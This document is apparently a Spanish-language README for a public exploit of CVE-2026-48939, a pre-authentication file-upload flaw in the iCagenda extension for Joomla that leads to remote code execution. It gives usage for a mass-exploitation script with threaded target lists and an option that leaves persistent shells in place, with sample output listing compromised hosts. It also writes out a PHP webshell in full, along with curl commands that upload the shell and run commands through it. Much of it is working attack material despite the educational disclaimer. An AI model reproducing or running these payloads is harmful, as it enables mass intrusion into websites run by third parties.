
Exploit RCE de carga arbitraria de archivos sin autenticación previa para la extensión iCagenda de Joomla < 4.0.8 (CVSS 10.0)
CVE-2026-48939 es una vulnerabilidad crítica con CVSS 10.0 en la extensión de calendario de eventos iCagenda para Joomla. La función de adjuntar archivos del formulario de registro de eventos del frontend aplica los controles de acceso solo en la capa de vista, no en el controlador, lo que permite la subida de archivos sin autenticación y sin validación de extensión.
Los archivos subidos se colocan directamente bajo la raíz web en /images/icagenda/frontend/attachments/ y son ejecutables como PHP de inmediato.
| Versión de iCagenda | Estado |
|---|---|
| 3.2.1 – 3.9.14 | Vulnerable |
| 4.0.0 – 4.0.7 | Vulnerable |
| 3.9.15 / 4.0.8+ | Parcheada |
El controlador registration.submit procesa las subidas de archivos sin aplicar la restricción de acceso "Solo registrados" configurada en los ajustes del componente. Los archivos adjuntos se guardan con su extensión original sin listas blancas, ni validación de tipo MIME o de contenido.
View Layer → "Registered Only" enforced (attempts to block)
Controller → No auth check whatsoever (trivially bypassed by POST)
File Handler → No extension allowlist, no MIME check, no content scan
Destination → Web-accessible directory → PHP executes directly
POST /index.php?option=com_icagenda&task=registration.submit
jform[attachment] = shell.php → saved to /images/icagenda/frontend/attachments/
GET /images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id
→ PHP executed → RCE
git clone https://github.com/shinthink/CVE-2026-48939.git
cd CVE-2026-48939
pip install -r requirements.txt
# Single target
python cve_2026_48939.py -t target.com
# Mass exploit
python cve_2026_48939.py -f targets.txt
# Persistent shell (no cleanup)
python cve_2026_48939.py -t target.com --no-cleanup
# Save results
python cve_2026_48939.py -f targets.txt -o rce.txt
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save RCE results to file
--threads Concurrent workers (default: 25)
--no-cleanup Leave shells on target
-v, --verbose Show detailed output
$ python cve_2026_48939.py -t target.com -v
CVE-2026-48939 — iCagenda Joomla RCE Exploit
CVSS 10.0 | Pre-Auth | File Upload → RCE
[+] POST registration.submit (jform[attachment]): HTTP 200
[+] Shell: https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php
Host : target.com
iCagenda : YES v4.0.5
Vuln : YES
RCE : YES
Shell : https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php
Output : uid=1001(www-data) gid=1001(www-data) groups=1001(www-data)
Time : 3.2s
CVE-2026-48939 iCagenda RCE Exploit
Targets: 500 | Threads: 25 | Cleanup: ON
-------------------------------------------------------
[RCE] target-1.com v4.0.5 3.2s
uid=1001(www-data) gid=1001(www-data)
[RCE] target-2.com v3.9.12 4.1s
uid=33(www-data) gid=33(www-data)
-------------------------------------------------------
Total: 500 | iCagenda: 23 | RCE: 8
-------------------------------------------------------
Paso 1 — Subir webshell PHP
cat > shell.php << 'EOF'
<?php echo "OK|".php_uname(); system($_GET["c"]); ?>
EOF
curl -sk -X POST \
-F "title=Event" \
-F "jform[attachment][email protected];type=application/x-php" \
"https://target.com/index.php?option=com_icagenda&task=registration.submit"
Paso 2 — Ejecutar comandos
curl -sk "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?c=id"
SOLO PARA FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS.
Este software está destinado a profesionales de la seguridad que realizan pruebas de penetración autorizadas, organizaciones que auditan su propia infraestructura e investigadores que estudian la explotación de vulnerabilidades.
El acceso no autorizado a sistemas informáticos es ilegal y puede violar:
- Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. 1030)
- Indonesia: UU ITE Pasal 30 & 46
- Unión Europea: Directiva 2013/40/UE
- Reino Unido: Computer Misuse Act 1990
Los autores no asumen ninguna responsabilidad por el mal uso.
| Recurso | Enlace |
|---|---|
| Aviso de IONIX | ionix.io/threat-center/cve-2026-48939 |
| Entrada en NVD | CVE-2026-48939 |
| Registro de cambios de iCagenda | icagenda.com/docs |
Este proyecto no está afiliado con iCagenda ni con Joomlic.